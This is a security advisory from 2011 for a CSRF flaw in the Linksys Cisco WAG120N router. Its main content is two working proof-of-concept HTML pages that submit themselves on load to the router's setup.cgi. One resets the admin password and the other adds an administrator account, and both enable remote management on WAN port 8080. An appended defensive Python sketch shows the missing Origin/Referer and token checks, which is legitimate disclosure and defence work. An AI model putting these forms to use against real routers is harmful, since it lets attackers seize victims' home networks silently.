Linksys Cisco WAG120N CSRF Vulnerability

Published: 2011-02-26 CVE: N/A OSVDB-ID: 71032
----------------------------------------------------------------
Hardware : Linksys Cisco WAG120N (and perhaps similar versions)
Type of vulnerability : CSRF (change admin password and add user)
Risk : High
----------------------------------------------------------------
Vendor Website : http://linksysbycisco.com
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------

CSRF For Change Admin Password :
# Use sysPasswd and sysConfirmPasswd to set the new password

<html>
<body onLoad="javascript:document.form.submit()">
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="1">
<input type="hidden" name="h_user_list" value="1">
<input type="hidden" name="sysname" value="admin">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="no">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>

----------------------------------------------------------------

CSRF For Add Administrator User :
# Use sysPasswd and sysConfirmPasswd to set the new password
# If you add a new user you should set pass_is_none=yes

<html>
<body onLoad="javascript:document.form.submit()">
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="2">
<input type="hidden" name="h_user_list" value="2">
<input type="hidden" name="sysname" value="ircrash">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="yes">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>


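Added illustration from the defender's side, covering both forms above (this is not the advisory's code and not Linksys firmware): the check that setup.cgi lacks. Both PoCs work only because the CGI accepts a state-changing POST from any page, so a same-origin check on Origin/Referer plus a per-session token would reject them. The names csrf_check and issue_token, the csrf_token form field and the sample headers are assumptions constructed here; only the setup.cgi field names and the 192.168.1.1 address come from the advisory.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# LAN origin the advisory's forms post to (assumption: the admin UI is served from here).
ROUTER_ORIGIN = "http://192.168.1.1"
# Per-session synchronizer tokens (hypothetical): issued when Administration.htm
# is rendered, required on every state-changing POST to setup.cgi.
_session_tokens = {}

def issue_token(session_id):
    token = secrets.token_hex(16)
    _session_tokens[session_id] = token
    return token

def csrf_check(headers, body, session_id):
    """Return (accepted, reason). Accept only requests that provably came from
    the router's own UI: same-origin Origin/Referer AND a valid session token."""
    # 1. Source check: a form auto-submitted from a third-party page arrives with
    #    that page's Origin/Referer (or none at all), never the router's own.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False, "missing Origin/Referer on state-changing POST"
    parts = urlsplit(src)
    if "%s://%s" % (parts.scheme, parts.netloc) != ROUTER_ORIGIN:
        return False, "cross-origin request from " + parts.netloc
    # 2. Token check: every hidden field in the PoC (sysPasswd, pass_is_none,
    #    remote_management, ...) is chosen by the page author; only a value bound
    #    to the victim's session cannot be supplied by a third-party page.
    fields = parse_qs(body, keep_blank_values=True)
    token = fields.get("csrf_token", [""])[0]
    expected = _session_tokens.get(session_id, "")
    if not expected or not hmac.compare_digest(token.encode(), expected.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"

# Constructed sample: the urlencoded body the advisory's second form submits,
# abbreviated to the fields that drive the change.
POC_BODY = ("user_list=2&h_user_list=2&sysname=ircrash&sysPasswd=password"
            "&sysConfirmPasswd=password&remote_management=enable&http_wanport=8080"
            "&pass_is_none=yes&todo=save&this_file=Administration.htm")

def demo():
    """Forged submission (third-party Referer, no token) vs. a legitimate one."""
    sid = "victim-session"
    tok = issue_token(sid)
    forged = csrf_check({"Referer": "http://third-party.example/page.html"}, POC_BODY, sid)
    legit = csrf_check({"Origin": ROUTER_ORIGIN}, POC_BODY + "&csrf_token=" + tok, sid)
    return forged, legit  # ((False, 'cross-origin request from third-party.example'), (True, 'ok'))
```

On firmware that cannot be patched, the same Origin/Referer rule can be enforced by a reverse proxy in front of the admin UI, and the WAN-side management port the PoCs enable (http_wanport=8080) should stay disabled.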
Other References

EXPLOIT-DB Advisory : http://www.exploit-db.com/exploits/16252/
SECLISTS Advisory : http://seclists.org/bugtraq/2011/Feb/252